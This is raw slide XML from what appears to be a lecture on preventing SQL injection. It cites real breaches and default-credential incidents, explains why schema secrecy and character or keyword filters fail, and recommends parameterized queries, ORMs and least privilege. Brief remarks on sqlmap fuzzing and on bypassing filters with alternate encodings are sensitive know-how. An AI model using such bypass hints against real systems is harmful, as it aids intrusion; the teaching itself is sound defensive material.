              <a:t> - US Election Assistance Commission hacked via SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>11/2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - VTech exposes PII of 4-million families via SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>05/2011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Barracuda Networks gets hacked via SQLi during WAF patching</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>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54"/>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Keeping schema’s secret</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1808" name="Google Shape;1808;p254"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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255"/>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trike="sngStrike"/>
              <a:t>Keeping schema’s secret</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools such as sqlmap can fuzz queries to find injections that work</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1814" name="Google Shape;1814;p255"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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256"/>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trike="sngStrike"/>
              <a:t>Keeping schemas secret</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools such as sqlmap can fuzz queries to find injections that work</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevent special characters in input</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1820" name="Google Shape;1820;p256"/>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 (that don’t work)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1821" name="Google Shape;1821;p256"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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257"/>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trike="sngStrike"/>
              <a:t>Keeping schema’s secret</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools such as sqlmap can fuzz queries to find injections that work</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>Prevent special characters in input</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad password policies prohibit special characters, such as &amp;,;=” to prevent SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is often a          for SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Other encoding formats can bypass these checks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>‘ is U+02BC in Unicode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1827" name="Google Shape;1827;p257"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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58"/>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trike="sngStrike"/>
              <a:t>Keeping schema’s secret</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools such as sqlmap can fuzz queries to find injections that work</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>Prevent special characters in input</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad password policies prohibit special characters, such as &amp;,;=” to prevent SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is often a          for SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Other encoding formats can bypass these checks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>‘ is U+02BC in Unicode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disallowed words</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1833" name="Google Shape;1833;p258"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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259"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="8557500" cy="16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trike="sngStrike"/>
              <a:t>Keeping schema’s secret</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools such as sqlmap can fuzz queries to find injections that work</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>Prevent special characters in input</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad password policies prohibit special characters, such as &amp;,;=” to prevent SQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is often a red flag for SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Other encoding formats can bypass these checks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>‘ is U+02BC in Unicode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>Disallowed words</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trying to prevent certain words in input, such as ‘SELECT’ and ‘UNION’ is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>guaranteed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(a) miss certain words and</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(b) annoy your users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1839" name="Google Shape;1839;p259"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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260"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3709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Use Parameterized Queries</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ORM’s</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="Google Shape;1845;p260"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1846" name="Google Shape;1846;p260"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222000" y="1559400"/>
            <a:ext cx="7120481" cy="728400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1847" name="Google Shape;1847;p260"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283325" y="3376050"/>
            <a:ext cx="6670149" cy="79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44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1354300"/>
            <a:ext cx="8593762" cy="30471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SzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Equifax used the default credentials of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>admin/admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>’ for their admin portal</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>It is speculated that the Target data breach was facilitated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>hard coded default credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t> within a software management system to help the attackers move laterally</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Dow Jones exposed 2.2 million customer records because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>default (public) permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t> on their S3 buckets that didn’t limit who could retrieve content</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p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Examples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261"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1853" name="Google Shape;1853;p261"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3709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Use Principle of Least Privilege - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Every component or user should have the least privilege possible to perform its job</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You should follow this principle in anything you build</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>People often GRANT too many privileges to database users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It doesn’t prevent SQL injection attacks, but it mitigates the damage. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Your DB user shouldn’t be able to perform admin tasks, write to host files, etc.</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854" name="Google Shape;1854;p261"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505500" y="2985550"/>
            <a:ext cx="3432748" cy="1552824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1855" name="Google Shape;1855;p261"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4082975" y="2985550"/>
            <a:ext cx="4631725" cy="16150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262"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Execution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263"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
